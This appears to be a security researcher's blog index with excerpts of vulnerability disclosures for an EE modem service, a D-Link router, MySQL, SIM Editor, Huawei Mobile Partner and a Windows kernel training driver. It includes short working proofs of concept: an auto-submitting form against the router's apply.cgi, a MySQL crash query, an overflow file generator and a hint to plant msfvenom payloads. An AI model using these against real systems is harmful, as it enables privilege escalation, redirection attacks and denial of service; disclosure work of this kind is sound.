EE 4GEE Mini Local Privilege Escalation Vulnerability (CVE-2018-14327)

I brought a 4G modem from EE to browser internet when I’m outside. It’s a portable 4G WiFi mobile broadband modem as seen below.

You can find this 4G modem from these websites:

One day I had a look at my services installed on my computer for troubleshooting a problem and I saw a strange service named “Alcatel OSPREY3_MINI Modem Device Helper”. I was wondering how this was installed, and then I figured that it’s my modem service from the EE 4G WiFi modem. Then after a bit of Googling, I realized that the modem was manufactured by Alcatel. I had a look at the service installed just for curiosity and found that that there is an unquoted service path vulnerability.

C:\>sc qc "Alcatel OSPREY3_MINI Modem Device Helper"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Web Connecton\EE40\BackgroundService\ServiceManager.exe -start
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Alcatel OSPREY3_MINI Modem Device Helper
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

But you can’t directly write files because of folder permissions. I first thought this issue is useless to be reported. But just to be sure I had a look at the folder permissions of the “EE40” folder and W00t! It had been set to “Everyone:(OI)(CI)(F)” which means any user can read, write, execute, create, delete do anything inside that folder and it’s subfolders. The ACL rules had OI – Object Inherit and CI – Container Inherit which means all the files in this folder and subfolders have full permissions.
(more…)

Advertisements

Exploiting Format Strings in Windows

I thought of making a small challenge in exploiting format strings in Windows. This is how it looks, it asks for a filename to open. At first this might be a bit confusing. There’s no vulnerable functions in reading a file. You can see that our first argument to the program is echoed back in the program.

Let’s investigate this inside a debugger. As you can see if argc == 2 the application continues the flow and argv[1] is passed into that function highlighted.



(more…)

Windows Kernel Exploitation: Stack Overflow

Introduction

This post is on exploiting a stack based buffer overflow in the HackSysExtremeVulnerableDriver.
There’s lot of background theory required to understand types of Windows drivers, developing drivers, debugging drivers, etc. I will only focus on developing the exploit while explaining some internal structures briefly. I would assume you have experience with assembly, C, debugging in the userland.
This driver is a kernel driver. A driver is typically used to get our code into the kernel. An unhandled exception will cause the famous BSOD. I will be using Windows 7 32-bit for this since it doesn’t support SMEP (Supervisor Mode Execution Prevention) or SMAP (Supervisor Mode Access Prevention). In simple words, I would say that when SMEP is enabled the CPU will generate a fault whenever the ring0 tries to execute code from a page marked with the user bit. Basically, due to this being not enabled, we can map our shellcode to steal the ‘System’ token. Check the Shellcode Analysis part for the analysis. Exploiting this vulnerability on a 64-bit system is different.
You can use the OSR Driver Loader to load the driver into the system.
If you want to debug the machine itself using windbg you can use VirtualKD or LiveKD

You can add a new serial connection using VirtualBox or VMware, so you can debug the guest system via windbg. I will be using a serial connection from VMware.
For kernel data structures refer to this. I have used it mostly to refer the structures.
After you have registered the driver you should see this in ‘msinfo32’.

If you check the loaded modules in the ‘System’ process you should see our kernel driver ‘HEVD.sys’.


(more…)

D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

(more…)

MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.

Syntax:

 
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an Example POC would be:

 
select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
 
---------------------------------------------------------------------------------------------------------------
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server

mysql>
---------------------------------------------------------------------------------------------------------------


(more…)

Sim Editor Stack Based Buffer Overflow

Last week I bought a SIM card reader. Along with it came the software for it. It was SIM Card Editor 6.6. You can download it from here. The app is pretty cool. You can manipulate the SIM card’s data with it. However I noticed something strange in this application. When we are loading file for example suppose with 4 “A” characters we would get the output as “ªª”. Just two characters will be displayed. When I gave the input as “4141” the result would be “AA”. This time the correct output we need. What was the reason for this? From what I noticed was that when we enter “AAAA” the hex values would be “\x41\x41\x41\x41” the app will take two values each and evaluate to hex.

When we give the input as “4141” this is what happens.

So suppose we want to enter a hex string we have to just give the input. For example we want to give the application “AA” we have to give just “4141”. Taking that into consideration the rest was easy. The return address is overwritten with our buffer.

buff = "41" * 500
with open("ex.sms", 'w') as f:
    f.write(buff)

(more…)

Escalating Local Privileges Using Mobile Partner

Mobile Partner is a very popular software that ships with Huawei internet dongles. Recently I noticed the fact that the “Mobile Partner” directory and all subdirectories, files by default has full permissions granted the Users group. This means that any User in your system can plant a malicious executable and escalate privileges when the Administrator runs Mobile Partner. Why not bind the exe using msfpayload or msfvenom? 😉

 Proof of Concept

By default in my dongle I had Mobile Partner 11.302.09.00.03 and if you are using versions below you might find out that this folder and it’s contents has been granted full permissions not only to the Users group but also to Everyone which means any random user can plant anything inside this directory.

C:\Program Files (x86)>cacls "Mobile Partner"
C:\Program Files (x86)\Mobile Partner Everyone:(OI)(CI)F
                                      BUILTIN\Users:(OI)(CI)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F

                                      NT AUTHORITY\SYSTEM:(ID)F
                                      NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                      BUILTIN\Administrators:(ID)F
                                      BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                      CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(ID)(special access:)

                             GENERIC_READ

                             GENERIC_EXECUTE

C:\Program Files>cd "Mobile Partner"

C:\Program Files (x86)\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe Everyone:F
                                                         BUILTIN\Users:F
                                                         NT AUTHORITY\SYSTEM:(ID)F
                                                         BUILTIN\Administrators:(ID)F
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R

(more…)